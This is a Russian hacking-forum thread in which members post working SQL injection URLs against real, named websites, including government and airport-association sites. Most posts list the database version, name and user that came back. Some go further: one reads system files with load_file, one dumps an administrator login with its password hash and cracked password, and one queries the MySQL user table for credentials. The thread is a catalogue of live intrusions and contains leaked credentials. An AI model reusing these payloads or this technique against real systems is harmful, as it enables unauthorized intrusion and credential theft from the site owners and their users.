HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.04.2009, 18:50
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

PR5
http://www.sundaystandard.info/news/news_item.php?NewsID=3302&GroupID=3+and+substring(y(),1,1)=x

y1=version
y2=database
y3=user


x=Version: 5.0.67-community-log
Database : sundaysf_ss
User : sundaysf_ss@localhost
 
Ответить с цитированием

  #2  
Старый 01.04.2009, 19:17
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами: 9270510

Репутация: 519


По умолчанию

Код:
http://www.sottoilmare.it/archivionews.php?getid=-1+union+all+select+0,1,concat_ws(user(),version(),database()),3,4,5,6,7--+
юзер/версия/бд:

Код:
4.1.23-pro-gpl-logMV2696_sim@81.88.49.17sottoilmare_it_data
----------------------------------------------------------------------

Код:
http://www.senor.es/ingles/ver_novedades.php?idn=-1+union+all+select+concat_ws(user(),version(),database()),1,2,3,4--
юзер/версия/бд:

Код:
5.0.45-community-ntsenor_usuario@localhostsenorbd
---------------------------------------------------------------------

Код:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-1+union+all+select+0,1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9,10--
юзер/версия/бд:

Код:
5.0.4532908_user116602@lnh-util.bluehalo.myregisteredsite.com32908_leadacidbatteryinfoorg
----------------------------------------------------------------------------------------
The End!
 
Ответить с цитированием

  #3  
Старый 01.04.2009, 18:54
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
С нами: 9230381

Репутация: 90
По умолчанию

Target: www.nasr.com.au

Evil link: http://www.nasr.com.au/release.asp?NewsId=-31152+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21--

Version: 4.1.22-community-nt
database: snet
user: root@localhost
OS: Windows Server 2003


Чтение файлов:
http://www.nasr.com.au/release.asp?NewsId=-31152+union+select+1,2,3,4,5,6,7,load_file(0x633a5c626f6f742e696e69),9,10,11,12,13,14,15,16,17,18,19,20,21--
Где 0x633a5c626f6f742e696e69 - это c:\boot.ini в hex-представлении.
 
Ответить с цитированием

  #4  
Старый 01.04.2009, 19:01
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

PR5

http://www.traffictechnologytoday.com/news.php?NewsID=-11440+union+select+1,2,3,concat_ws(0x3a,version(), database(),useR()),5,6,7,8,9,10


Database Version: 4.1.15-Debian_0.dotdeb.4-log
Database name: passenger
User name: passenger01@62.128.157.148


PR6
http://www.tropicalforesttrust.com/news-detail.php?newsid=-74+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),useR()),5,6,7,8,9,10,11,12,13,14


Database Version: 4.0.27-standard-log
Database name: db200813045
User name: dbo200813045@212.227.114.142
 
Ответить с цитированием

  #5  
Старый 01.04.2009, 19:20
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

PR6
http://www.ethanol.org/news/index.php?newsid=-25+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6,7,8


Database Version: 5.0.77-community
Database name: ethanol_ethanol
User name: ethanol_ethanol@localhost
 
Ответить с цитированием

  #6  
Старый 01.04.2009, 19:24
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами: 9116712

Репутация: 688
По умолчанию

Код:
http://www.uniteck.ru/?type=-560+union+select+1,2,3,concat_ ws(0x3a,version(),database(),user()),5,6,7,8--
Database Version : 5.0.41-log
Database name : uniteck
User name : uniteck@cub.mplik.ru



админ :


Код:
http://www.uniteck.ru/?type=-560+union+select+1,2,3,concat_ws(0x3a,logi n,pass),5,6,7,8+from+user--
Код:
admin:683a6aad2b7543f113cf2ba32b42c2d8 - 1972oxa
вход с сайта

Последний раз редактировалось f1ng3r; 01.04.2009 в 19:27..
 
Ответить с цитированием

  #7  
Старый 01.04.2009, 19:39
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

PR5
http://www.gaspowered.com/newsletters.php?newsID=20+AND+ASCII(SUBSTRING((sel ect+y()),1,1))>x--

y1=version
y2=database
y3=user

x1=53,46,48,46,53,49,97,45,99,111,109,109,117,110,10 5,116,121,45,108,111,103
x2=103,97,115,112,111,119,101,114
x3=103,97,115,112,111,119,101,114,64,108,111,99,97,1 08,104,111,115,116


Version : 5.0.51a-community-log
Database : gaspower
User : gaspower@localhost


PR4
http://www.ootpdevelopments.com/article.php?newsid=396+AND+SUBSTRING((y())1,1))=x

x=Version : 5.0.26
Database : misc
User : ootpdevmisc@localhost
 
Ответить с цитированием

  #8  
Старый 02.04.2009, 00:14
fker
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами: 9187097

Репутация: 158
Smile

Australian Airports Association (pr5)
хакиры отакуют аэропорты (=
Код:
http://www.aaal.com.au/category.php?id=18+AND+ASCII(SUBSTRING((select+y()),1,1))>x/*
y1=version
y2=database
y3=user

x1=52,46,49,46,49,49,45,68,101,98,105,97,110,95,52,1 15,97,114,103,100,55
x2=97,97,97,108
x3=97,105,114,112,111,114,116,115,64,108,111,99,97,1 08,104,111,115,116


version() - 4.1.11-Debian_4sargd7
database() - aaal
user() - airports@localhost
---------------------------------------------------------------------------------------------------------------

Последний раз редактировалось fker; 02.04.2009 в 00:17.. Причина: боянчег запостил случайно...
 
Ответить с цитированием

  #9  
Старый 05.04.2009, 20:28
fker
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами: 9187097

Репутация: 158
По умолчанию

pr4
Код:
http://imperial.ca.gov/section.php?id=17+and+ascii(substring(y()),1,1))=x
y1=version
y2=user

x1=53,46,48,46,48,55
x2=114,105,98,97,114,100,111,104,100,122,64,108,111, 99,97,108,104,111,115,116


version() - 5.0.07
user() - ribardohdz@localhost
 
Ответить с цитированием

  #10  
Старый 01.04.2009, 19:43
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами: 9129884

Репутация: 240
По умолчанию

Код:
http://www.pna.gov.ph/index.php?idn=1&sid=&nid=1&rid=79746+union+select+1,2,3,concat(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
version()4.0.20a-nt
database():test
user():root@localhost
Код:
http://www.pna.gov.ph/index.php?idn=1&sid=&nid=1&rid=79746+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user/*
__
Код:
http://www.contraloriabarrancabermeja.gov.co/article.php?sid=5+union+select+1,2,3,4,5,6,7,8,9,10,11

Последний раз редактировалось M.W.N.N.; 01.04.2009 в 19:51..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.